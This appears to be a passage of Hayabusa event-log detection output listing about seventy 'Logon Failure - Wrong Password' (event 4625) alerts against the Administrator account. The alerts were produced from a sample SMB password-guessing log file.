| 1006 | 2016-09-20 01:50:21.836 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1007 | 2016-09-20 01:50:21.911 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1008 | 2016-09-20 01:50:21.956 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1009 | 2016-09-20 01:50:22.001 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1010 | 2016-09-20 01:50:22.044 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1011 | 2016-09-20 01:50:22.085 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1012 | 2016-09-20 01:50:22.116 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1013 | 2016-09-20 01:50:22.153 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1014 | 2016-09-20 01:50:22.193 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1015 | 2016-09-20 01:50:22.223 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1016 | 2016-09-20 01:50:22.256 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1017 | 2016-09-20 01:50:22.293 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1018 | 2016-09-20 01:50:22.323 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1019 | 2016-09-20 01:50:22.368 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1020 | 2016-09-20 01:50:22.405 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1021 | 2016-09-20 01:50:22.431 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1022 | 2016-09-20 01:50:22.486 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1023 | 2016-09-20 01:50:22.527 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1024 | 2016-09-20 01:50:22.564 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1025 | 2016-09-20 01:50:22.594 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1026 | 2016-09-20 01:50:22.632 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1027 | 2016-09-20 01:50:22.677 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1028 | 2016-09-20 01:50:22.709 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1029 | 2016-09-20 01:50:22.744 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1030 | 2016-09-20 01:50:22.830 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1031 | 2016-09-20 01:50:22.877 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1032 | 2016-09-20 01:50:22.925 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1033 | 2016-09-20 01:50:22.960 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1034 | 2016-09-20 01:50:23.000 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1035 | 2016-09-20 01:50:23.035 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1036 | 2016-09-20 01:50:23.076 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1037 | 2016-09-20 01:50:23.107 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1038 | 2016-09-20 01:50:23.143 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1039 | 2016-09-20 01:50:23.175 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1040 | 2016-09-20 01:50:23.211 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1041 | 2016-09-20 01:50:23.251 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1042 | 2016-09-20 01:50:23.283 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1043 | 2016-09-20 01:50:23.324 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1044 | 2016-09-20 01:50:23.370 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1045 | 2016-09-20 01:50:23.415 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1046 | 2016-09-20 01:50:23.450 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1047 | 2016-09-20 01:50:23.504 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1048 | 2016-09-20 01:50:23.549 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1049 | 2016-09-20 01:50:23.596 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1050 | 2016-09-20 01:50:23.636 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1051 | 2016-09-20 01:50:23.676 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1052 | 2016-09-20 01:50:23.733 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1053 | 2016-09-20 01:50:23.810 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1054 | 2016-09-20 01:50:23.920 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1055 | 2016-09-20 01:50:23.962 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1056 | 2016-09-20 01:50:24.004 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1057 | 2016-09-20 01:50:24.051 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1058 | 2016-09-20 01:50:24.092 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1059 | 2016-09-20 01:50:24.128 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1060 | 2016-09-20 01:50:24.167 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1061 | 2016-09-20 01:50:24.203 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1062 | 2016-09-20 01:50:24.237 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1063 | 2016-09-20 01:50:24.277 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1064 | 2016-09-20 01:50:24.325 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1065 | 2016-09-20 01:50:24.363 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1066 | 2016-09-20 01:50:24.410 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1067 | 2016-09-20 01:50:24.464 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1068 | 2016-09-20 01:50:24.508 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1069 | 2016-09-20 01:50:24.549 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1070 | 2016-09-20 01:50:24.596 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1071 | 2016-09-20 01:50:24.636 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1072 | 2016-09-20 01:50:24.697 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1073 | 2016-09-20 01:50:24.749 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1074 | 2016-09-20 01:50:24.795 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1075 | 2016-09-20 01:50:24.842 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
